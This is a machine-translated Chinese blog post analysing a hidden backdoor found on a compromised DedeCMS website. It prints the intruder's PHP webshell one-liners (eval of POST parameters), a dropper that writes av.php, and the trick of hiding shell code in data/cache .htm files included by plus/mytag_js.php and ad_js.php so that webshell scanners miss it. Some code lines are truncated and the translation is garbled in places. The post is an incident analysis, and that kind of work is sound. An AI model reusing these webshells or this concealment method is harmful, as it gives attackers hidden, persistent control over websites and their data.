该单位一个站点使用的 DEDECM 今天由一家黑色的 broad getshell 公司提交给 wooyun.com
为了恢复黑阔入侵的技术,Guige 的 getshell 测试没有成功。你有没有得到一次机会就不会再成功了?
但是,我只能打包代码。我只能用各种 webshell 扫描仪扫描 data/tplcache/xxxxx.inc 文件。文件代码如下:
{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}
但是我在所有的 web 目录中都找不到 90sec.php 文件。一位朋友指出可能是其他文件,包括这个文件。然后我使用 Seay 的代码审计工具定义了各种关键字,但仍然找不到它们。
最后,老板转到 data/cache 目录,找到几个 HTM 文件,myad-1.HTM、myad-16.HTM、mytag-1208.HTM 等。用以下代码打开这些 HTML 文件:document.write(“dedecmsisok<?php@eval($_POST[cmd]);?>”);
Select Code
Copy
document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);
Select Code
Copy 
document.write(“<?php$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<?php eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
Select Code
Copy 
document.write(“<?phpecho ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,
看到这些文件真奇怪。我不知道黑阔想要什么??虽然代码看起来很熟悉,但 HTML 文件可以用作后门吗?想想我的朋友说的 include,然后结合前一段时间 getshell 漏洞攻击的细节,最后转到 plus/mytag_Js.php 文件。在这个文件中,我终于找到了一个黑色、宽阔、肆无忌惮的地方。主要代码如下:
看到上面的代码,我们应该知道黑阔有多邪恶。在生成的 HTM 格式缓存文件中编写各种类型的一句代码,然后修改 plus/ad_Js.php 和 mytag_Js.php 文件,包括 HTM 格式的缓存文件。这样,黑阔只需在菜刀中填写以下 URL 即可连接一句话
http://www.xxx.com/plus/mytag_ js.php?id=1208
http://www.xxx.com/plus/ad_ js.php?id=1
特定 ID 和文件名与 data/cache 目录中的 myad-1.htm 和 mytag-1208.htm 相关。因此,各种 web shell 扫描仪不会扫描 web shell 后门文件,因为许多默认情况下不会扫描 HTM转载请注明:汇站网 » 隐藏后门的特殊 DEDE 方法(dedecms 漏洞 90sec.php 文件)
常见问题
相关文章
猜你喜欢
- 织梦缩略图失真模糊的解决方法 2021-08-30
- 修改dedecms添加栏目时“文章命名规则”默认路径 2021-08-30
- 基于DEDECMS的php脚本限制的设置方法 2021-08-24
- 用dedecms建立英语工作站的诀窍是什么 2021-08-24
- 如何修改织梦DedeCms验证码的样式 2021-08-24
- dedecms如何添加和部署php文件 2021-08-24
- dedecms如何自动生成tag标签 2021-08-24
- dedecms将搜索功能添加到网站中 2021-08-24
- 如何将css导入织梦 2021-08-24
- 在dedecms中删除系统自定义变量的方法是什么 2021-08-24
